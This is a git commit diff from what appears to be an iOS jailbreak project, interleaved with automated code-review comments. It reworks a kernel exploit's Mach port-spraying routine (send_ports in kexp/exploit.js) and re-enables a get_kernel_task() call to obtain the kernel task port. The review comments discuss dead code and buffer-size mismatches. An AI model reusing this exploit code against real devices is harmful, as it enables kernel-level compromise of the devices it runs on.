| author | spv420 <spv@spv.sh> | 2022-08-01 01:10:25 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-08-01 01:10:25 -0400 |
| commit | 0df8ea8b4bb9d9ee9d45a56eb5df2c2c6a23127c (patch) | |
| tree | ae0643c4bb134b8ab721de846e7197145fe1933e /src | |
| parent | 9d184c28ecd7ee3080145df9034217ff7443ef8b (diff) | |
native_ptr w00t
Diffstat (limited to 'src')
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 27 | ||||
| -rw-r--r-- | src/stage4/lib/native_ptr.js | 20 | ||||
| -rw-r--r-- | src/stage4/main.js | 132 |
3 files changed, 97 insertions, 82 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
 ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+ p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
 var ret = read_u32(mp);
 shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
 }
 function send_ports(target, payload, num, number_port_descs) {
+ if (0) {
 var init_port_set = shit_heap(num * 4);
 for (var i = 0; i < num; i++) {
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
 large_buf[req_head_msgh_id >>> 2] = 1337;
 // p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+ var init_port_set = new mach_port_t(num);
+
+ var InP = new Request_sp(number_port_descs);
+ var InP_obj = InP.deref();
+ InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+ for (var i = 0; i < number_port_descs; i++) {
+ InP_obj.init_port_set[i].address = init_port_set.addy;
+ InP_obj.init_port_set[i].count = num;
+ InP_obj.init_port_set[i].disposition = 19;
+ InP_obj.init_port_set[i].deallocate = false;
+ InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ }
+
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = target;
+ InP_obj.Head.msgh_local_port = 0;
+ InP_obj.Head.msgh_id = 1337;
+
+ InP.write(InP_obj);
- var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
 return ret;
 }
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 464d865..3741e80 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
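Review bot: The `+ if (0) {` / `+}` pair in the -250 and -281 hunks keeps the whole old body of `send_ports` (the `shit_heap`/`large_buf` path) as dead code, and the old `var init_port_set = shit_heap(num * 4);` inside it now shares one hoisted `var` binding with the new `var init_port_set = new mach_port_t(num);` below it; the disabled block should be deleted (git keeps the history) or, if it is kept for comparison, carry a comment such as `// legacy raw-buffer path, disabled; superseded by the Request_sp version below`. The same `if (0)` idiom appears in the main.js hunk of this commit. Separately, `InP` is sized by `new Request_sp(number_port_descs)` while the `mach_msg` length stays the literal `0x1c + (number_port_descs * 0xc)`, so the buffer size and the declared message size now come from two different formulas; if `Request_sp`'s count multiplies the whole 40-byte type (as the `deref_all` branch in the native_ptr.js hunk suggests) the two disagree for any count above one, and a comment or a single shared size expression would make the intended layout explicit. `send_ports` begins before this hunk.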
@@ -33,7 +33,6 @@ class native_ptr {
 if (Object.getPrototypeOf(this).deref_all != undefined) {
 this.size *= this.count;
- p0laris_log("get lucky %d", this.size);
 }
 if (this.addy === undefined) {
@@ -197,34 +196,27 @@ function mach_msg_header_t_obj_to_buf(obj) {
 function mach_msg_body_t_buf_to_obj(buf) {
 var ret = {};
- ret.msgh_descriptor_count = u32_to_u8x4(buf);
+ ret.msgh_descriptor_count = u8x4_to_u32(buf);
 return ret;
 }
 function mach_msg_body_t_obj_to_buf(obj) {
- var ret = u8x4_to_u32(obj.msgh_descriptor_count);
+ var ret = u32_to_u8x4(obj.msgh_descriptor_count);
 return ret;
 }
 function Request_sp_buf_to_obj(buf) {
 var ret = {};
- p0laris_log("w00t %d %s", buf.length, Object.getOwnPropertyNames(Object.getPrototypeOf(buf)).toString());
 var Head_buf = buf.subarray(0, 24);
- p0laris_log("w00t");
 var msgh_body_buf = buf.subarray(24, 28);
- p0laris_log("w00t");
 var init_port_set_buf = buf.subarray(28);
- p0laris_log("w00t");
 ret.Head = mach_msg_header_t_buf_to_obj(Head_buf);
- p0laris_log("w00t");
 ret.msgh_body = mach_msg_body_t_buf_to_obj(msgh_body_buf);
- p0laris_log("w00t");
 ret.init_port_set = new Array();
 for (var i = 0; i < (buf.length - 28) / 28; i++) {
- p0laris_log("%d", i);
 var init_port_set_buf = buf.subarray((i * 28) + 28);
 ret.init_port_set.push(mach_msg_ool_ports_descriptor_t_buf_to_obj(init_port_set_buf));
 }
@@ -236,7 +228,6 @@ function Request_sp_obj_to_buf(obj) {
 var ret = new Uint8Array(this.size * this.count);
 var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
 var begin = 0;
- p0laris_log("w00t");
 var i = 0;
 begin = i;
@@ -245,7 +236,6 @@ function Request_sp_obj_to_buf(obj) {
 ret[i] = tmp[i - begin];
 }
- p0laris_log("w00t");
 begin = i;
 var tmp = mach_msg_body_t_obj_to_buf(obj.msgh_body);
@@ -254,7 +244,6 @@ function Request_sp_obj_to_buf(obj) {
 ret[i] = tmp[i - begin];
 }
- p0laris_log("w00t");
 begin = i;
 for (var i = 0; i < obj.init_port_set.length; i++) {
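Review bot: The `u8x4_to_u32`/`u32_to_u8x4` swap in `mach_msg_body_t_buf_to_obj` and `mach_msg_body_t_obj_to_buf` corrects the conversion direction, but the descriptor loop that follows in `Request_sp_buf_to_obj` (context lines of the -197 hunk) still walks `init_port_set` with a 28-byte stride — `(buf.length - 28) / 28` and `buf.subarray((i * 28) + 28)` — while `Request_sp_obj_to_buf` in the -254/-263 hunks writes each descriptor at `begin + (i * 12) + j` and `mach_msg_ool_ports_descriptor_t` is declared with size 12 in the -279 hunk. A write-then-deref round trip of a message with more than one descriptor therefore does not appear to reproduce the descriptors it was given, and the new `send_ports` code in exploit.js depends on `deref()` yielding an entry for every index up to `number_port_descs`. Since `ret.msgh_body.msgh_descriptor_count` has just been parsed, the loop could be bounded by it, e.g. `for (var i = 0; i < ret.msgh_body.msgh_descriptor_count; i++) {` with `var init_port_set_buf = buf.subarray((i * 12) + 28, (i * 12) + 40);`. `Request_sp_buf_to_obj`'s closing lines are outside this hunk, so the stride inferred here should be checked against the full file.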
@@ -263,7 +252,6 @@ function Request_sp_obj_to_buf(obj) {
 ret[begin + (i * 12) + j] = tmp[j];
 }
 }
- p0laris_log("w00t");
 return ret;
 }
@@ -279,4 +267,6 @@ var mach_msg_ool_ports_descriptor_t = native_ptr_type(12,
 var Request_sp = native_ptr_type(24 + 4 + 12, Request_sp_buf_to_obj, Request_sp_obj_to_buf);
-Request_sp.prototype.deref_all = true;
\ No newline at end of file
+Request_sp.prototype.deref_all = true;
+
+var mach_port_t = native_ptr_type(4);
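Review bot: `var mach_port_t = native_ptr_type(4);` is the only type in this file created without `buf_to_obj`/`obj_to_buf` converters (compare `Request_sp` on the context line above and, per the hunk header, `mach_msg_ool_ports_descriptor_t`), so if `native_ptr.deref()` and `.write()` invoke those converters unconditionally — the class body is outside this hunk, so I cannot confirm — any deref or write through a `mach_port_t` will throw, and the exploit.js hunk indeed only ever reads `.addy` from it. A one-line comment would pin that contract: `// mach_port_t: opaque 4-byte slots with no (de)serializer; only .addy is meaningful`. The trailing-newline fix on `Request_sp.prototype.deref_all` is fine as is.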
\ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
 sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
 prep_shit();
- var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
- var addy = init_port_set.addy;
- var init_port_set_obj = init_port_set.deref();
- init_port_set_obj.address = 0x41414141;
- init_port_set_obj.count = 0x42424242;
- init_port_set_obj.disposition = 19;
- init_port_set_obj.deallocate = false;
- init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- init_port_set.write(init_port_set_obj, 0);
- init_port_set.write(init_port_set_obj, 1);
- init_port_set.write(init_port_set_obj, 2);
- init_port_set.write(init_port_set_obj, 3);
- p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
- JSON.stringify(init_port_set.deref(1)),
- JSON.stringify(init_port_set.deref(2)),
- JSON.stringify(init_port_set.deref(3)));
-
- var Head = new mach_msg_header_t();
- var addy = Head.addy;
- var Head_obj = Head.deref();
- Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- Head_obj.msgh_remote_port = 0x41424344;
- Head_obj.msgh_local_port = 0x45464748;
- Head_obj.msgh_id = 1337;
- Head.write(Head_obj);
- p0laris_log("%s", JSON.stringify(Head.deref()));
-
- p0laris_log("here");
-
- var req = new Request_sp(4);
- p0laris_log("here");
- var addy = req.addy;
- p0laris_log("here");
- var req_obj = req.deref();
- p0laris_log("here");
-
- req_obj.msgh_body.msgh_descriptor_count = 4;
- p0laris_log("here");
- for (var i = 0; i < 4; i++) {
- req_obj.init_port_set[i].address = 0x1234;
- req_obj.init_port_set[i].count = 0x1235;
- req_obj.init_port_set[i].disposition = 19;
- req_obj.init_port_set[i].deallocate = false;
- req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- }
-
- p0laris_log("here");
- req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- p0laris_log("here");
- req_obj.Head.msgh_remote_port = 0x41424344;
- p0laris_log("here");
- req_obj.Head.msgh_local_port = 0x45464748;
- p0laris_log("here");
- req_obj.Head.msgh_id = 1337;
-
- p0laris_log("here");
- req.write(req_obj);
- p0laris_log("here");
- p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
- if (typeof value === 'number') {
- return "0x" + value.toString(16);
+ if (0) {
+ var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+ var addy = init_port_set.addy;
+ var init_port_set_obj = init_port_set.deref();
+ init_port_set_obj.address = 0x41414141;
+ init_port_set_obj.count = 0x42424242;
+ init_port_set_obj.disposition = 19;
+ init_port_set_obj.deallocate = false;
+ init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ init_port_set.write(init_port_set_obj, 0);
+ init_port_set.write(init_port_set_obj, 1);
+ init_port_set.write(init_port_set_obj, 2);
+ init_port_set.write(init_port_set_obj, 3);
+ p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+ JSON.stringify(init_port_set.deref(1)),
+ JSON.stringify(init_port_set.deref(2)),
+ JSON.stringify(init_port_set.deref(3)));
+
+ var Head = new mach_msg_header_t();
+ var addy = Head.addy;
+ var Head_obj = Head.deref();
+ Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ Head_obj.msgh_remote_port = 0x41424344;
+ Head_obj.msgh_local_port = 0x45464748;
+ Head_obj.msgh_id = 1337;
+ Head.write(Head_obj);
+ p0laris_log("%s", JSON.stringify(Head.deref()));
+
+ p0laris_log("here");
+
+ var req = new Request_sp(4);
+ p0laris_log("here");
+ var addy = req.addy;
+ p0laris_log("here");
+ var req_obj = req.deref();
+ p0laris_log("here");
+
+ req_obj.msgh_body.msgh_descriptor_count = 4;
+ p0laris_log("here");
+ for (var i = 0; i < 4; i++) {
+ req_obj.init_port_set[i].address = 0x1234;
+ req_obj.init_port_set[i].count = 0x1235;
+ req_obj.init_port_set[i].disposition = 19;
+ req_obj.init_port_set[i].deallocate = false;
+ req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
 }
- return value;
- }, "\t"));
- p0laris_log("here");
+ p0laris_log("here");
+ req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ p0laris_log("here");
+ req_obj.Head.msgh_remote_port = 0x41424344;
+ p0laris_log("here");
+ req_obj.Head.msgh_local_port = 0x45464748;
+ p0laris_log("here");
+ req_obj.Head.msgh_id = 1337;
+
+ p0laris_log("here");
+ req.write(req_obj);
+ p0laris_log("here");
+ p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+ if (typeof value === 'number') {
+ return "0x" + value.toString(16);
+ }
+
+ return value;
+ }, "\t"));
+ p0laris_log("here");
+ }
-// var tfp0 = get_kernel_task();
+ var tfp0 = get_kernel_task();
 syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 return 0;
|
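Review bot: `var tfp0 = get_kernel_task();` is re-enabled but `tfp0` is never read before `return 0;`, so whatever `get_kernel_task()` returns — including any failure value it may use, which I cannot see from here — is discarded and `main` still reports success. If the call is only being exercised for its side effects, a comment like `// result intentionally unused for now` would say so; otherwise its outcome should be logged or reflected in the return value. The `+ if (0) {` block above it parks roughly sixty lines of scratch logging as dead code inside `main`; deleting it (git keeps the history) would leave a far smaller function and avoids the `var addy` triple declaration the block carries. `main` begins before this hunk and its closing brace is after it.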
